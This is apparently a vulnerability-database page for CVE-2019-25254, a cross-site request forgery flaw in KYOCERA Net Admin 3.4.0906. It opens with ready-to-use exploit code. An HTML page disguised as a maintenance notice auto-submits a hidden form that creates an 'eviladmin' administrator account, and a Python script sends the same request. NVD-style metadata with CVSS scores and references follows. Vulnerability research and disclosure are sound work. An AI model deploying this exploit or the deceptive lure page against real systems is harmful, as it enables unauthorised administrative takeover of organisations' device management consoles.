CVE-2019-25254

<!-- CSRF PoC for CVE-2019-25254: KYOCERA Net Admin Admin Creation --> <!DOCTYPE html> <html> <head> <title>KYOCERA Net Admin - System Update</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .hidden-form { display: none; } </style> </head> <body> <h1>System Maintenance Page</h1> <p>Please wait while we verify your account...</p> <!-- Hidden form for CSRF attack --> <form id="csrfForm" class="hidden-form" action="https://TARGET_HOST:443/kyocera/useradmin/userAdd" method="POST"> <input type="hidden" name="userName" value="eviladmin"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="confirmPassword" value="P@ssw0rd123"> <input type="hidden" name="role" value="Administrator"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="description" value="System Administrator"> <input type="hidden" name="action" value="add"> </form> <script> // Auto-submit form on page load document.addEventListener('DOMContentLoaded', function() { // Set target server IP/hostname before deployment var targetHost = 'TARGET_IP_OR_HOSTNAME'; var form = document.getElementById('csrfForm'); form.action = 'https://' + targetHost + ':443/kyocera/useradmin/userAdd'; form.submit(); }); </script> <noscript> <p>If page does not redirect, <a href="#" onclick="document.getElementById('csrfForm').submit(); return false;">click here</a>.</p> </noscript> </body> </html> <!-- Python PoC using requests library --> """ import requests import sys def exploit_kyocera_csrf(target_url, attacker_username, attacker_password): """ Exploit CVE-2019-25254 - KYOCERA Net Admin CSRF Admin Creation Args: target_url: Base URL of KYOCERA Net Admin (e.g., https://target:443) attacker_username: Username for the new admin account attacker_password: Password for the new admin account """ exploit_url = f"{target_url}/kyocera/useradmin/userAdd" # Payload for creating admin user via CSRF payload = { 'userName': attacker_username, 'password': attacker_password, 'confirmPassword': attacker_password, 'role': 'Administrator', 'email': f'{attacker_username}@evil.local', 'description': 'System Administrator', 'action': 'add' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'{target_url}/kyocera/useradmin/userList' } try: response = requests.post(exploit_url, data=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Exploit sent successfully!") print(f"[+] New admin account created:") print(f" Username: {attacker_username}") print(f" Password: {attacker_password}") print(f"[+] Login URL: {target_url}/kyocera/login") else: print(f"[-] Exploit failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == '__main__': if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} https://192.168.1.100:443 eviladmin P@ssw0rd123") sys.exit(1) exploit_kyocera_csrf(sys.argv[1], sys.argv[2], sys.argv[3]) """

{"cve": {"id": "CVE-2019-25254", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:54.010", "lastModified": "2026-01-16T19:16:04.333", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "KYOCERA Net Admin 3.4.0906 contains a cross-site request forgery vulnerability that allows attackers to create administrative users without proper request validation. Attackers can craft malicious web pages that automatically submit forms to add new admin accounts with predefined credentials when a logged-in user visits the page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kyocera:net_admin:3.4.0906:*:*:*:*:*:*:*", "matchCriteriaId": "D78EC8D2-739A-47F1-8B22-251456FDF471"}]}]}], "references": [{"url": "https://global.kyocera.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/44431", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5458.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5458.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}